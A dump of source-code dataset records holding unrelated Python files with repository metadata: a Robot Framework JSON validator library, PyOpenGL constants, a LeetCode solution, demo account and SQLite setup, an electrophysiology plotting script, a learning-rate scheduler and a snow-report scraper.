_source_ - json структура
*Return:*\n
Json строка
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Json to string | ${json_string}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json}= | String to json | ${json_string} |
| | ${string}= | Json to string | ${json} |
| | ${pretty_string}= | Pretty print json | ${string} |
| | Log to console | ${pretty_string} |
"""
try:
load_input_json=json.dumps(source)
except ValueError, e:
raise JsonValidatorError("Could serialize '%s' to JSON: %s"%(source, e))
return load_input_json
def get_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [http://goessner.net/articles/JsonPath/|JSONPath] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONPath выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то возвращается ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Get json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Get elements | ${json_example} | $.store.book[*].author |
=>\n
| [u'Nigel Rees', u'Evelyn Waugh', u'Herman Melville', u'J. R. R. Tolkien']
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonpath
jsonpath_expr=parse(expr)
# список возвращаемых элементов
value_list=[]
for match in jsonpath_expr.find(load_input_json):
value_list.append(match.value)
if not value_list:
return None
else:
return value_list
def select_elements (self, json_string, expr):
"""
Возвращает список элементов из _json_string_, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - JSONSelect выражение;
*Return:*\n
Список найденных элементов. Если элементы не найдены, то ``None``
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Select json elements | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_elements}= | Select elements | ${json_example} | .author:contains("Evelyn Waugh")~.price |
=>\n
| 12.99
"""
load_input_json=self.string_to_json (json_string)
# парсинг jsonselect
jsonselect.Parser(load_input_json)
values=jsonselect.select(expr, load_input_json)
return values
def element_should_exist (self, json_string, expr):
"""
Проверка существования одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | Element should exist | ${json_example} | $..book[?(@.author=='Herman Melville')] |
"""
value=self.select_elements (json_string, expr)
if value is None:
raise JsonValidatorError ('Elements %s does not exist'%expr)
def element_should_not_exist (self, json_string, expr):
"""
Проверка отсутствия одного или более элементов, соответствующих [ http://jsonselect.org/ | JSONSelect] выражению.
*Args:*\n
_json_string_ - json-строка;\n
_expr_ - jsonpath выражение;\n
*Raises:*\n
JsonValidatorError
"""
value=self.select_elements (json_string, expr)
if value is not None:
raise JsonValidatorError ('Elements %s exist but should not'%expr)
def update_json(self, json_string, expr, value, index=0):
"""
Замена значения в json-строке.
*Args:*\n
_json_string_ - json-строка dict;\n
_expr_ - JSONPath выражение для определения заменяемого значения;\n
_value_ - значение, на которое будет произведена замена;\n
_index_ - устанавливает индекс для выбора элемента внутри списка совпадений, по-умолчанию равен 0;\n
*Return:*\n
Изменённый json в виде словаря.
*Example:*\n
| *Settings* | *Value* |
| Library | JsonValidator |
| Library | OperatingSystem |
| *Test Cases* | *Action* | *Argument* | *Argument* |
| Update element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
| | ${json_update}= | Update_json | ${json_example} | $..color | changed |
"""
load_input_json=self.string_to_json (json_string)
matches = self._json_path_search(load_input_json, expr)
datum_object = matches[int(index)]
if not isinstance(datum_object, DatumInContext):
raise JsonValidatorError("Nothing found by the given json-path")
path = datum_object.path
# Изменить справочник используя полученные данные
# Если пользователь указал на список
if isinstance(path, Index):
datum_object.context.value[datum_object.path.index] = value
# Если пользователь указал на значение (string, bool, integer or complex)
elif isinstance(path, Fields):
datum_object.context.value[datum_object.path.fields[0]] = value
return load_input_json
def pretty_print_json (self, json_string):
    """
    Return the pretty-printed form of the JSON string _json_string_.\n
    Uses json.dumps with _indent=2, ensure_ascii=False_.

    *Args:*\n
    _json_string_ - JSON string.

    *Example:*\n
    | *Settings* | *Value* |
    | Library    | JsonValidator |
    | Library    | OperatingSystem |
    | *Test Cases* | *Action* | *Argument* | *Argument* |
    | Check element | ${pretty_json}=   | Pretty print json |  {a:1,foo:[{b:2,c:3},{d:"baz",e:4}]} |
    |               | Log               | ${pretty_json} |
    =>\n
    | {
    |   "a": 1,
    |   "foo": [
    |     {
    |       "c": 3,
    |       "b": 2
    |     },
    |     {
    |       "e": 4,
    |       "d": "baz"
    |     }
    |   ]
    | }
    """
    return json.dumps(self.string_to_json(json_string), indent=2, ensure_ascii=False)
class JsonValidatorError(Exception):
pass
| 0 | 25 | 25 |
64d838f0e8d3c1849373b5c022ce97c530fc2f78 | 3,338 | py | Python | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/tessellation_shader.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/tessellation_shader.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/ARB/tessellation_shader.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_tessellation_shader'
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN=_C('GL_FRACTIONAL_EVEN',0x8E7C)
GL_FRACTIONAL_ODD=_C('GL_FRACTIONAL_ODD',0x8E7B)
GL_ISOLINES=_C('GL_ISOLINES',0x8E7A)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E1F)
GL_MAX_PATCH_VERTICES=_C('GL_MAX_PATCH_VERTICES',0x8E7D)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS',0x8E83)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E7F)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS',0x8E86)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E80)
GL_MAX_TESS_GEN_LEVEL=_C('GL_MAX_TESS_GEN_LEVEL',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS=_C('GL_MAX_TESS_PATCH_COMPONENTS',0x8E84)
GL_PATCHES=_C('GL_PATCHES',0x000E)
GL_PATCH_DEFAULT_INNER_LEVEL=_C('GL_PATCH_DEFAULT_INNER_LEVEL',0x8E73)
GL_PATCH_DEFAULT_OUTER_LEVEL=_C('GL_PATCH_DEFAULT_OUTER_LEVEL',0x8E74)
GL_PATCH_VERTICES=_C('GL_PATCH_VERTICES',0x8E72)
GL_QUADS=_C('GL_QUADS',0x0007)
GL_TESS_CONTROL_OUTPUT_VERTICES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES',0x8E75)
GL_TESS_CONTROL_SHADER=_C('GL_TESS_CONTROL_SHADER',0x8E88)
GL_TESS_EVALUATION_SHADER=_C('GL_TESS_EVALUATION_SHADER',0x8E87)
GL_TESS_GEN_MODE=_C('GL_TESS_GEN_MODE',0x8E76)
GL_TESS_GEN_POINT_MODE=_C('GL_TESS_GEN_POINT_MODE',0x8E79)
GL_TESS_GEN_SPACING=_C('GL_TESS_GEN_SPACING',0x8E77)
GL_TESS_GEN_VERTEX_ORDER=_C('GL_TESS_GEN_VERTEX_ORDER',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER',0x84F0)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER',0x84F1)
@_f
@_p.types(None,_cs.GLenum,arrays.GLfloatArray)
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
| 58.561404 | 121 | 0.864889 | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_tessellation_shader'
def _f( function ):
    # Wrap a stub signature in a real platform GL entry point, registered under
    # this extension name with the standard error checker attached.
    return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_tessellation_shader',error_checker=_errors._error_checker)
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN=_C('GL_FRACTIONAL_EVEN',0x8E7C)
GL_FRACTIONAL_ODD=_C('GL_FRACTIONAL_ODD',0x8E7B)
GL_ISOLINES=_C('GL_ISOLINES',0x8E7A)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E1F)
GL_MAX_PATCH_VERTICES=_C('GL_MAX_PATCH_VERTICES',0x8E7D)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS',0x8E83)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E7F)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS',0x8E86)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E80)
GL_MAX_TESS_GEN_LEVEL=_C('GL_MAX_TESS_GEN_LEVEL',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS=_C('GL_MAX_TESS_PATCH_COMPONENTS',0x8E84)
GL_PATCHES=_C('GL_PATCHES',0x000E)
GL_PATCH_DEFAULT_INNER_LEVEL=_C('GL_PATCH_DEFAULT_INNER_LEVEL',0x8E73)
GL_PATCH_DEFAULT_OUTER_LEVEL=_C('GL_PATCH_DEFAULT_OUTER_LEVEL',0x8E74)
GL_PATCH_VERTICES=_C('GL_PATCH_VERTICES',0x8E72)
GL_QUADS=_C('GL_QUADS',0x0007)
GL_TESS_CONTROL_OUTPUT_VERTICES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES',0x8E75)
GL_TESS_CONTROL_SHADER=_C('GL_TESS_CONTROL_SHADER',0x8E88)
GL_TESS_EVALUATION_SHADER=_C('GL_TESS_EVALUATION_SHADER',0x8E87)
GL_TESS_GEN_MODE=_C('GL_TESS_GEN_MODE',0x8E76)
GL_TESS_GEN_POINT_MODE=_C('GL_TESS_GEN_POINT_MODE',0x8E79)
GL_TESS_GEN_SPACING=_C('GL_TESS_GEN_SPACING',0x8E77)
GL_TESS_GEN_VERTEX_ORDER=_C('GL_TESS_GEN_VERTEX_ORDER',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER',0x84F0)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER',0x84F1)
@_f
@_p.types(None,_cs.GLenum,arrays.GLfloatArray)
def glPatchParameterfv(pname,values):pass  # stub body; @_f replaces it with the wrapped GL entry point
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glPatchParameteri(pname,value):pass  # stub body; @_f replaces it with the wrapped GL entry point
| 158 | 0 | 69 |
60c414f3260ed62c8e71db22a56db59f43b23e67 | 550 | py | Python | Algorithms/leet_code/remove_element/remove_element.py | burakhanaksoy/PythonAlgorithms | f19c11b373e47b1d8ec8e26560471a0603dbfbdb | [
"MIT"
] | 1 | 2021-04-19T12:55:51.000Z | 2021-04-19T12:55:51.000Z | Algorithms/leet_code/remove_element/remove_element.py | burakhanaksoy/PythonAlgorithms | f19c11b373e47b1d8ec8e26560471a0603dbfbdb | [
"MIT"
] | null | null | null | Algorithms/leet_code/remove_element/remove_element.py | burakhanaksoy/PythonAlgorithms | f19c11b373e47b1d8ec8e26560471a0603dbfbdb | [
"MIT"
] | null | null | null | # Given an array nums and a value val,
# remove all instances of that value in-place and return the new length.
# Do not allocate extra space for another array, you must do this by modifying
# the input array in-place with O(1) extra memory.
solution = Solution()
print(solution.removeElement([0, 1, 2, 2, 3, 0, 4, 2], 2))
| 28.947368 | 78 | 0.594545 | # Given an array nums and a value val,
# remove all instances of that value in-place and return the new length.
# Do not allocate extra space for another array, you must do this by modifying
# the input array in-place with O(1) extra memory.
class Solution:
    def removeElement(self, nums, val):
        """Remove every occurrence of val from nums in place and return the new length.

        The previous implementation popped matching items one at a time while
        scanning, which is O(n^2) because each pop shifts all following
        elements. Rebuilding the filtered contents once and assigning through
        a slice keeps the in-place contract (callers observe the shrunken
        list) in a single O(n) pass.
        """
        nums[:] = [x for x in nums if x != val]
        return len(nums)
solution = Solution()
print(solution.removeElement([0, 1, 2, 2, 3, 0, 4, 2], 2))
| 182 | -6 | 49 |
b0da2f6036c5f5d2316234733054d8f793009d96 | 3,069 | py | Python | test/create_accounts.py | unification-com/haiku-node-prototype | ea77aa90f6b3f08d004be1c24e6b8d62e83bc66b | [
"MIT"
] | 3 | 2018-06-15T18:02:05.000Z | 2018-07-06T02:32:18.000Z | test/create_accounts.py | unification-com/haiku-node-prototype | ea77aa90f6b3f08d004be1c24e6b8d62e83bc66b | [
"MIT"
] | 4 | 2018-08-17T06:51:34.000Z | 2018-08-17T08:39:24.000Z | test/create_accounts.py | unification-com/haiku-node-prototype | ea77aa90f6b3f08d004be1c24e6b8d62e83bc66b | [
"MIT"
] | null | null | null | import inspect
import json
import logging
import os
import sqlite3
from pathlib import Path
from haiku_node.blockchain_helpers.accounts import (
AccountManager, make_default_accounts)
log = logging.getLogger('haiku_node')
demo_config = json.loads(Path('data/demo_config.json').read_text())
if __name__ == "__main__":
configure_logging()
process()
| 30.386139 | 129 | 0.626588 | import inspect
import json
import logging
import os
import sqlite3
from pathlib import Path
from haiku_node.blockchain_helpers.accounts import (
AccountManager, make_default_accounts)
log = logging.getLogger('haiku_node')
demo_config = json.loads(Path('data/demo_config.json').read_text())
def configure_logging():
    """Attach a DEBUG-level stream handler with a timestamped format to the module logger."""
    log.setLevel(logging.DEBUG)
    handler = logging.StreamHandler()
    handler.setLevel(logging.DEBUG)
    handler.setFormatter(logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
    log.addHandler(handler)
def create_lookup_db(app, demo_apps):
    """Create and seed the SQLite Unification lookup database for one demo app.

    Writes test/data/<app>_unification_lookup.db containing the lookup,
    lookup_meta, schema_map and table_maps tables, populated from the app's
    entry in demo_apps, then re-opens the file and queries one row as a
    sanity check.

    Args:
        app: key into demo_apps naming the app (e.g. 'app1').
        demo_apps: the 'demo_apps' mapping from the demo config JSON.
    """
    app_conf = demo_apps[app]

    log.info(f'Create {app} Lookup database')

    # Resolve the db path relative to this file's repository layout so the
    # script works regardless of the current working directory.
    currentdir = os.path.dirname(
        os.path.abspath(inspect.getfile(inspect.currentframe())))
    parentdir = os.path.dirname(currentdir)

    db_path = Path(f'{parentdir}/test/data/{app}_unification_lookup.db')
    db_name = str(db_path.resolve())
    log.info(db_name)

    conn = sqlite3.connect(db_name)
    c = conn.cursor()

    c.execute('''CREATE TABLE lookup
                 (native_id text, eos_account text)''')
    c.execute('''CREATE TABLE lookup_meta
                 (native_table text, native_field text, field_type text)''')
    c.execute('''CREATE TABLE schema_map
                 (sc_schema_pkey text, native_db text, native_db_platform text)''')
    c.execute('''CREATE TABLE table_maps
                 (sc_schema_pkey text, sc_table_name text, real_table_name text, user_id_column text)''')

    # NOTE(review): values are interpolated into the SQL via f-strings. That is
    # tolerable for this trusted demo config, but parameterized queries should
    # be used if the config could ever come from untrusted input.
    c.execute(f"INSERT INTO lookup_meta VALUES ('{app_conf['lookup']['lookup_meta']['native_table']}', "
              f"'{app_conf['lookup']['lookup_meta']['native_field']}', "
              f"'{app_conf['lookup']['lookup_meta']['field_type']}')")

    for u in app_conf['lookup']['lookup_users']:
        c.execute(f"INSERT INTO lookup VALUES ('{u['native_id']}', '{u['eos_account']}')")

    for sc in app_conf['db_schemas']:
        c.execute(f"INSERT INTO schema_map VALUES ('{sc['sc_schema_pkey']}', '{sc['database']}', '{sc['db_platform']}')")
        for tm in sc['table_maps']:
            c.execute(
                f"INSERT INTO table_maps VALUES ('{sc['sc_schema_pkey']}', '{tm['schema_table_id']}', "
                f"'{tm['db_table']}', '{tm['user_id_column']}')")

    conn.commit()
    conn.close()

    # Re-open and verify that the seeded data round-trips.
    conn = sqlite3.connect(db_name)
    c = conn.cursor()

    log.info('check user2 == 2')
    t = ('user2',)
    c.execute('SELECT native_id FROM lookup WHERE eos_account=?', t)
    res = c.fetchone()[0]
    print("user2 native ID:", res)
    conn.close()
def process():
    """Create the default demo accounts and one lookup database per app.

    Spins up an AccountManager against the host node, creates the demo app
    and user accounts listed in the demo config, then builds a SQLite lookup
    database for each app.
    """
    manager = AccountManager(host=True)

    appnames = ['app1', 'app2', 'app3']
    usernames = ['user1', 'user2', 'user3', 'unif.mother']

    make_default_accounts(manager, demo_config, appnames, usernames)

    for appname in appnames:
        create_lookup_db(appname, demo_apps=demo_config['demo_apps'])
if __name__ == "__main__":
configure_logging()
process()
| 2,630 | 0 | 69 |
2e2f1b45c93126700b91414329a68232f9c22dce | 70 | py | Python | clustering/__init__.py | ebridge2/ams_446 | 2c7d8db96c5875ee5b4c0e2d44dad80812ac4140 | [
"Apache-2.0"
] | null | null | null | clustering/__init__.py | ebridge2/ams_446 | 2c7d8db96c5875ee5b4c0e2d44dad80812ac4140 | [
"Apache-2.0"
] | null | null | null | clustering/__init__.py | ebridge2/ams_446 | 2c7d8db96c5875ee5b4c0e2d44dad80812ac4140 | [
"Apache-2.0"
] | null | null | null | from spectral import Spectral
from kmeans import Kmeans
import kernel
| 17.5 | 29 | 0.857143 | from spectral import Spectral
from kmeans import Kmeans
import kernel
| 0 | 0 | 0 |
1506c683ed3b9db097a3a29e521df20d976b0af2 | 1,695 | py | Python | dev/python/2018-12-20 real epsc.py | konung-yaropolk/pyABF | b5620e73ac5d060129b844da44f8b2611536ac56 | [
"MIT"
] | 74 | 2017-11-06T17:53:48.000Z | 2022-03-27T12:14:46.000Z | dev/python/2018-12-20 real epsc.py | konung-yaropolk/pyABF | b5620e73ac5d060129b844da44f8b2611536ac56 | [
"MIT"
] | 116 | 2018-01-16T21:36:29.000Z | 2022-03-31T11:46:04.000Z | dev/python/2018-12-20 real epsc.py | konung-yaropolk/pyABF | b5620e73ac5d060129b844da44f8b2611536ac56 | [
"MIT"
] | 30 | 2018-06-28T13:19:53.000Z | 2022-03-25T02:52:48.000Z | """
Determine what paramaters create real-looking EPSCs.
What I concluded was that 30pA and 180ms tau looks good.
"""
import os
import sys
PATH_HERE = os.path.abspath(os.path.dirname(__file__))
PATH_DATA = os.path.abspath(PATH_HERE+"../../../data/abfs/")
PATH_SRC = os.path.abspath(PATH_HERE+"../../../src/")
sys.path.insert(0, PATH_SRC)
import pyabf
import pyabf.tools.generate
import glob
import matplotlib.pyplot as plt
import numpy as np
if __name__ == "__main__":
plotRealEPSC()
plotFakeEPSC()
plt.grid(alpha=.2)
plt.margins(0, .1)
plt.title("Real vs. Simulated EPSC")
plt.ylabel("current (pA)")
plt.xlabel("time (sec)")
plt.legend()
plt.savefig(__file__+".png")
print("DONE") | 25.298507 | 99 | 0.657227 | """
Determine what paramaters create real-looking EPSCs.
What I concluded was that 30pA and 180ms tau looks good.
"""
import os
import sys
PATH_HERE = os.path.abspath(os.path.dirname(__file__))
PATH_DATA = os.path.abspath(PATH_HERE+"../../../data/abfs/")
PATH_SRC = os.path.abspath(PATH_HERE+"../../../src/")
sys.path.insert(0, PATH_SRC)
import pyabf
import pyabf.tools.generate
import glob
import matplotlib.pyplot as plt
import numpy as np
def plotRealEPSC():
    """Plot a real EPSC from a recorded ABF sweep onto a new figure.

    Loads sweep 12 from a hard-coded recording, baseline-subtracts it over
    2.6-2.68 s, blanks everything outside the 2.68-2.75 s event window, and
    plots the remaining trace labelled "real".
    """
    # load a trace with a real-life EPSC
    # NOTE(review): hard-coded Windows network path; this only runs on the
    # original author's machine.
    abfPath = R"X:\Data\SD\Piriform Oxytocin\core ephys 2018\Sagittal Pilot\2018_12_11_ts_0020.abf"
    abf = pyabf.ABF(abfPath)
    abf.setSweep(12, baseline=[2.6, 2.68])

    # blank-out data we don't want to see (everything outside the event window)
    t1, t2 = [2.68, 2.75]
    abf.sweepY[:int(t1*abf.dataRate)] = np.nan
    abf.sweepY[int(t2*abf.dataRate):] = np.nan

    # plot it
    plt.figure()
    plt.plot(abf.sweepX, abf.sweepY, alpha=.5, label="real")
    return
def plotFakeEPSC():
    """Plot a simulated EPSC on the current figure for comparison.

    Synthesizes a 10 s sweep at 20 kHz, blanks everything outside the
    2.68-2.75 s window to match the real trace, adds a single -35 pA event
    with a 180 ms tau at 2.7 s, and plots it labelled "simulated".
    """
    # simulate a trace
    dataRate = 20000
    synth = pyabf.tools.generate.SynthSweep(dataRate, 10)

    # blank-out data we don't want to see (everything outside the event window)
    t1, t2 = [2.68, 2.75]
    synth.sweepY[:int(t1*dataRate)] = np.nan
    synth.sweepY[int(t2*dataRate):] = np.nan

    # add an EPSC for comparison; 180 ms tau was found to look realistic
    tauMs = 180
    synth.addEvent(2.7, -35, tauMs, False)

    # plot it
    plt.plot(synth.sweepX, synth.sweepY, lw=3, alpha=.5, label="simulated")
if __name__ == "__main__":
plotRealEPSC()
plotFakeEPSC()
plt.grid(alpha=.2)
plt.margins(0, .1)
plt.title("Real vs. Simulated EPSC")
plt.ylabel("current (pA)")
plt.xlabel("time (sec)")
plt.legend()
plt.savefig(__file__+".png")
print("DONE") | 922 | 0 | 46 |
edf816898adbf4d6c0423fb9f719b97e942b4134 | 880 | py | Python | modmel_spec/optimizer.py | joaomonteirof/dcase | 018bd225c45397bba616e3c70e4a7b50bb1010af | [
"MIT"
] | 12 | 2020-06-03T17:55:18.000Z | 2021-12-09T08:08:33.000Z | utils/optimizer.py | joaomonteirof/multitask_asv | 16795628e4bcac8c7b83b6edeacee1a739495092 | [
"MIT"
] | 2 | 2020-11-01T16:51:17.000Z | 2022-01-19T10:43:55.000Z | utils/optimizer.py | joaomonteirof/multitask_asv | 16795628e4bcac8c7b83b6edeacee1a739495092 | [
"MIT"
] | 6 | 2019-06-22T21:06:56.000Z | 2020-04-25T09:55:06.000Z | ## Adapted from https://github.com/kaituoxu/Speech-Transformer/blob/master/src/transformer/optimizer.py
import torch
class TransformerOptimizer(object):
"""A simple wrapper class for learning rate scheduling"""
| 27.5 | 106 | 0.731818 | ## Adapted from https://github.com/kaituoxu/Speech-Transformer/blob/master/src/transformer/optimizer.py
import torch
class TransformerOptimizer(object):
    """Wrap an optimizer and apply the Noam learning-rate schedule before each step.

    The rate at update t is ``k * lr * min(t ** -0.5, t * warmup_steps ** -1.5)``:
    it grows linearly for the first ``warmup_steps`` updates and then decays
    proportionally to ``1/sqrt(t)``.
    """

    def __init__(self, optimizer, lr, k=1, warmup_steps=4000):
        self.optimizer = optimizer
        self.k = k
        self.init_lr = lr
        self.warmup_steps = warmup_steps
        self.step_num = 0

    def zero_grad(self):
        """Clear gradients on the wrapped optimizer."""
        self.optimizer.zero_grad()

    def step(self):
        """Refresh the learning rate, then delegate the parameter update."""
        self._update_lr()
        self.optimizer.step()

    def _update_lr(self):
        """Advance the step counter and write the scheduled rate to every param group."""
        self.step_num += 1
        warmup_term = self.step_num * (self.warmup_steps ** (-1.5))
        decay_term = self.step_num ** (-0.5)
        new_rate = self.k * self.init_lr * min(decay_term, warmup_term)
        for group in self.optimizer.param_groups:
            group['lr'] = new_rate

    def load_state_dict(self, state_dict):
        """Restore the wrapped optimizer's state."""
        self.optimizer.load_state_dict(state_dict)

    def state_dict(self):
        """Return the wrapped optimizer's state."""
        return self.optimizer.state_dict()
| 523 | 0 | 144 |
ae974fcb97eb9a17b724bccf3ec2748cc1a0af0e | 2,364 | py | Python | snowfinder.py | Zenbiz/snowreports | 78a008f8dc54bfed1a36b3a780223eccb44d862c | [
"MIT"
] | null | null | null | snowfinder.py | Zenbiz/snowreports | 78a008f8dc54bfed1a36b3a780223eccb44d862c | [
"MIT"
] | null | null | null | snowfinder.py | Zenbiz/snowreports | 78a008f8dc54bfed1a36b3a780223eccb44d862c | [
"MIT"
] | null | null | null | # to install a program within colab use !pip install
import pandas as pd
# !pip show pandas
import requests
# !pip show requests
from bs4 import BeautifulSoup
# !pip show bs4
# !pip install tabulate
from tabulate import tabulate
# pip show tabulate
import csv
# pip show csv
import bs4
# pip3 install lxml
import lxml
import bs4.builder._lxml
res = requests.get('http://www.WEBSITE.com/news/snow-report/')
soup = BeautifulSoup(res.content,'lxml')
#!pip show lxml
table = soup.find_all('table')[0]
df = pd.read_html('http://www.WEBSITE.com/news/snow-report/', header=0)[0]
df
# Variable list objects (one pandas Series per snow-report column)
resort_list = df.iloc[:, 0]
new_snow = df.iloc[:, 1]
conditions = df.iloc[:, 2]
open_terrian = df.iloc[:, 3]
comments = df.iloc[:, 4]  # fix: closing bracket was missing, making the file a syntax error
"""
# Export to CSV within google co lab
from google.colab import files
# do not print header and do not print index column
